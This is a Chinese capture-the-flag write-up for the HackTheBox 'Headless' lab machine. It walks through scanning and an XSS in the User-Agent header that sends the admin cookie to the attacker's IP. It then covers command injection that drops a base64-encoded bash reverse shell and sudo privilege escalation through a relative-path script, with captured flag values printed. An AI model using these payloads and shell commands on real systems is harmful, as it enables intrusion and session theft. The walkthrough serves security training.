freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines][Easy]Headless
2024-04-18 20:25:23

Tools

https://github.com/MartinxMax/MDOG

针对XXS攻击

image.png

Main

$ nmap -sC -sV 10.10.11.8 --min-rate 1000

image.png

类似于留言板

image.png

通过目录扫描,发现一个仪表盘

$ gobuster dir -u "http://10.10.11.8:5000" -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

image.png

image.png

回到留言板

image.png

说IP已经被记录,那么我们尝试在数据包中的User-Agent字段注入js语句

管理员不过一会就中xss了

image.png

运行,复制payload,burp重放

<img src=1 onerror=window.open("http://10.10.14.25:9999/?id="+document.cookie)>

image.png

修改cookie

image.png

http://10.10.11.8:5000/dashboard

image.png

存在RCE

image.png

$ echo "bash -i >& /dev/tcp/10.10.14.25/10032 0>&1"|base64

date=;echo%20YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yNS8xMDAzMiAwPiYxCg==|base64%20-d>/tmp/shell.sh;chmod%20777%20/tmp/shell.sh;ls%20-al%20/tmp/shell.sh;echo%20'---------------';cat%20/tmp/shell.sh

这里面的+号需要进行url编码

image.png

date=;/bin/bash%20/tmp/shell.sh

image.png

User Flag

cat /home/dvir/user.txt

image.png

e2576236e9f7ebc8b857de1f2c10fe63

Root Flag

$ sudo -l

image.png

$ strings /usr/bin/syscheck

image.png

这个initdb.sh文件在本服务器是没有的,可以利用它

有趣的是./是一个相对路径
在app目录下执行/usr/bin/syscheck后,里的./initdb.sh指向的是app目录下的initdb.sh,而不是指向/usr/bin/下的initdb.sh

知识点:
查看当前用户在当前主机上的 sudo 权限,所列出的文件必须加sudo运行才是高权限

image.png

(~app)$ echo '/bin/bash'>initdb.sh;chomod +x initdb.sh;sudo /usr/bin/syscheck

成功提权

image.png

image.png

927acc092719872f616c53b4a0e910a9

Another

海外的大牛wp是

(~app)$ echo "chmod u+s /bin/bash" >initdb.sh;chmod +x initdb.sh;sudo /usr/bin/syscheck;/bin/bash -p

在普通用户下是无法给/bin/bash加SUID的

image.png

这里大牛的思路是利用sudo /usr/bin/syscheck执行的高权限执行initdb.sh,然后给/bin/bash添加一个SUID,这将意味着任意用户使用-p参数 privileged mode(特权模式)调用/bin/bash时候都将以root权限身份运行

image.png

我们再次返回到RCE点,发现的确如此

date=;/bin/bash%20-c%20-p%20"whoami"

image.png

# 漏洞 # 黑客 # 网络安全 # web安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者